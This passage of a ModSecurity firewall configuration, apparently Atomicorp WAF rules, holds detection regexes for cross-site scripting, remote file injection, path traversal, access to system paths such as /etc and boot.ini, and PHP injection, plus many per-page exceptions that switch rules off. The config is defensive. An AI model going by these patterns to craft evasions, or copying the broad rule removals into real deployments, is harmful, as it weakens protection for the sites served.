sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:xml|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:320472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',multimatch"

# Rule 340149:  XSS injection
SecRule REQUEST_URI|ARGS|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:xml|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:320471,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecMarker END_RULES_91620

SecRule REQUEST_FILENAME "/add_product\.php" "phase:2,id:91621,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91622,t:none,pass,nolog,skipAfter:END_RULES_91622"

SecRule REQUEST_URI|ARGS|!ARGS:picture|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320572,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:179,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:picture|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,id:320473,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:179,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91622

SecRule REQUEST_FILENAME "/wp-admin/page\.php" "phase:2,id:91623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/affiliate/scripts/server\.ph" "phase:2,id:91624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144"

SecRule REQUEST_FILENAME "/modules/resize\.php$" "phase:2,id:91625,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009"
SecAction "phase:2,id:91626,t:none,pass,nolog,skipAfter:END_RULES_91626"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/|!ARGS:imagefile "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:normalisePath,t:lowercase,capture,id:321486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS', logdata:'%{TX.0}'"


SecMarker END_RULES_91626

SecRule REQUEST_FILENAME "/nota_abm\.php$" "phase:2,id:91627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/admin/service/producttocategory\.php" "phase:2,id:91628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157"

SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:91629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/ajax_file_upload\.php" "phase:2,id:91630,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=347008"
SecAction "phase:2,id:91631,t:none,pass,nolog,skipAfter:END_RULES_91631"

SecRule ARGS|!ARGS:folder|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:320486,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
SecRule ARGS "\.\./\.\./\.\./\.\./\.\./\.\./\.\./" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:normalisePath,id:359008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"

SecMarker END_RULES_91631

SecRule REQUEST_FILENAME "/ajax_create_folder\.php" "phase:2,id:91632,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=347008"
SecAction "phase:2,id:91633,t:none,pass,nolog,skipAfter:END_RULES_91633"

SecRule ARGS|!ARGS:/folder/|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:320487,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
SecRule ARGS "\.\./\.\./\.\./\.\./\.\./\.\./\.\./" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:normalisePath,id:359208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"

SecMarker END_RULES_91633

SecRule REQUEST_FILENAME "/test_templates\.php" "phase:2,id:91634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:91635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/webacula/restorejob/" "phase:2,id:91636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/calendar/functions/popup\.php" "phase:2,id:91637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390715"


#PHP injection
SecRule REQUEST_FILENAME|ARGS|XML:/*|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/message/|!ARGS:/msg/ "\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:(?:g|b)z)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b" "phase:2,deny,log,status:403,rev:4,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390726',logdata:'%{TX.0}',severity:'2'"
SecRule REQUEST_FILENAME "/cms/" "phase:2,id:91638,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
SecAction "phase:2,id:91639,t:none,pass,nolog,skipAfter:END_RULES_91639"

SecRule QUERY_STRING|ARGS|!ARGS:content|!ARGS:wrap|!ARGS:txtContent|!ARGS:/template/|!ARGS:text "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" 	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,id:390727,log,auditlog,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to inject javascript ',logdata:'%{TX.0}'"

SecMarker END_RULES_91639

SecRule REQUEST_FILENAME "/tbl_export\.php" "phase:2,id:91640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"


SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:91641,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340009"
SecAction "phase:2,id:91642,t:none,pass,nolog,skipAfter:END_RULES_91642"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:/sql/|!ARGS:prefix|!ARGS:/txt/|!ARGS:/summary/|!ARGS:/text/|!ARGS:/^config/|!ARGS:/^dPcfg/|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/description/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/content/|!ARGS:/data/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/description/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:/body/ "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)" 	"phase:2,deny,status:403,t:none,log,auditlog,t:normalisePath,capture,id:390728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS', logdata:'%{TX.0}'"

SecMarker END_RULES_91642

SecRule REQUEST_FILENAME "/civicrm/admin/" "phase:2,id:91643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/civicrm/report/contact/summary" "phase:2,id:91644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/instellingen\.php" "phase:2,id:91645,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91646,t:none,pass,nolog,skipAfter:END_RULES_91646"

SecRule REQUEST_URI|ARGS|!ARGS:IDEAL_EMAIL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:390729,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:IDEAL_EMAIL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,id:390730,t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91646

SecRule REQUEST_FILENAME "/admin/listing_editresult\.php" "phase:2,id:91647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/items_price_result\.php" "phase:2,id:91648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/configure_homepage\.php" "phase:2,id:91649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/newreply\.php" "phase:2,id:91650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390621"

SecRule REQUEST_FILENAME "/editpost\.php" "phase:2,id:91651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390621,ctl:ruleRemovebyID=380020"

SecRule REQUEST_FILENAME "/admin/file_manager\.php" "phase:2,id:91652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340855"

SecRule REQUEST_FILENAME "/includes/conteudosactions\.php" "phase:2,id:91653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/webim/button\.php" "phase:2,id:91654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/includes/multimediaactions\.php" "phase:2,id:91655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/includes/lojaactions\.php" "phase:2,id:91656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"

SecRule REQUEST_FILENAME "/config/index\.php" "phase:2,id:91657,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
SecAction "phase:2,id:91658,t:none,pass,nolog,skipAfter:END_RULES_91658"

SecRule REQUEST_URI|ARGS|!ARGS:/CACHE_PATH/|!ARGS:SQLiteDataDir|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:390731,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"

SecMarker END_RULES_91658

